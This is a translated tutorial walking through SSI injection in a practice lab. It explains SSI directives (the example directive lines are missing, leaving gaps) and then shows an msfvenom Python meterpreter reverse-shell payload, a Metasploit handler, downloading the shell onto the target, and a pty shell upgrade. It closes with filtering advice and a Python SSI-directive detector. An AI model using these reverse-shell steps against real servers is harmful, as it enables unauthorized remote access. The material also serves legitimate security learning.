2025-01-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
In this issue, the editor explains how to analyze SSI injection in web security. The article is rich in content and approaches the topic from a professional point of view. I hope you get something out of reading it.
Preface
How do I enter the mainframe from the outside?
Introduction to SSI injection attack
SSI (Server Side Includes) exists to give static HTML pages dynamic behaviour: directives embedded in the page are processed by the server, which can execute system commands and return the corresponding results.
If files with suffixes such as `.stm`, `.shtm` or `.shtml` are found in the website directory, and the website does not filter SSI input or filters it inadequately, the site is likely to be vulnerable to SSI injection.
SSI syntax
① Display server-side environment variables
Name of this document:
Now time:
Display the IP address:
② Insert text content directly into the document
Note: with `file`, the included file can be in the same directory or one of its subdirectories, but not in a parent directory. With `virtual`, the included file can be given as a full path within a virtual directory on the web site.
③ Display information about web documents (such as file production date / size, etc.)
Last updated date of the file:
Length of the file:
④ Directly execute programs on the server (such as CGI or other executable programs)
For example:
List the files and directories in the current directory
In other words, this directive executes terminal commands.
For further use, download a shell script and rename it shell.php
Make webshell
The webshell was made with PHP before; this time Python is used.
```
msfvenom -p python/meterpreter/reverse_tcp lhost=10.0.2.4 lport=4444 -f raw > /root/Desktop/shell.py
```
Start a listener: use Metasploit to listen on port 4444.
```
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
```
After this is set up, the handler is listening on port 4444.
Move shell.py to the Apache directory so that it can be downloaded through a link to the IP address.
Then start the Apache service with `service apache2 start`.
Then execute the download command to download the shell to the site directory of the target machine.
Then give the shell execute permission before running it.
# add permission # execute
Then I saw that the browser kept sending requests, went to the terminal to check the listening status, and found that meterpreter was returned.
Enter `?` to view the currently executable commands
```
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    chmod         Change the permissions of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system
```
Enter `shell` to drop into a system shell, then check `id`: the current login is only an ordinary user, not root.
The terminal can be improved so that it displays the user name and hostname, like the terminal in Kali:
```
python -c 'import pty;pty.spawn("/bin/bash")'
```
Next would be privilege escalation. The practice range was built for learning SSI injection and sets no hurdle at that stage, so the walkthrough does not continue.
Servers with SSI vulnerabilities often have filtering mechanisms that need to be bypassed, for example by changing letter case.
Defensive measures:
1. Filter the special characters used in SSI syntax.
2. Turn off the server's SSI-related functions.
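One way to implement the first measure, as an added example that is not code from the original article: a Python input check that finds SSI directives regardless of letter case or URL encoding, plus an escaping helper so `<!--#` never reaches the server's SSI parser. The function names and the sample inputs are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Start of an SSI directive: "<!--#" followed by the element name (echo,
# include, exec, ...). Case-insensitive and lenient about whitespace, so
# changing letter case does not get past this check.
SSI_START = re.compile(r"<!--\s*#\s*([a-z]+)", re.IGNORECASE)


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so single- or double-encoded input is seen in clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssi_directives(value: str) -> list[str]:
    """Return the lower-cased element name of every SSI directive in value."""
    return [m.group(1).lower() for m in SSI_START.finditer(decode_layers(value))]


def neutralize(value: str) -> str:
    """HTML-escape a value before it is written into a page the server parses."""
    return html.escape(value, quote=True)


# Constructed sample inputs (not taken from the article or from real traffic).
SAMPLES = [
    "alice",
    '<!--#exec cmd="ls" -->',
    '<!--#EXEC cmd="ls" -->',
    "%3C%21--%23echo%20var%3D%22DATE_LOCAL%22%20--%3E",
    "%253C%2521--%2523echo%2520var%253D%2522DATE_LOCAL%2522--%253E",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        hits = find_ssi_directives(sample)
        verdict = "REJECT" if hits else "ok"
        print(f"{verdict:6} {hits!s:10} {neutralize(decode_layers(sample))}")
```

Input filtering complements the second measure rather than replacing it; on Apache httpd, for example, `Options IncludesNOEXEC` keeps includes but disables the `exec` element.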
The above is the editor's walkthrough of how to analyze SSI injection in web security. If you happen to have similar questions, you may refer to the analysis above. If you want to know more, you are welcome to follow the industry information channel.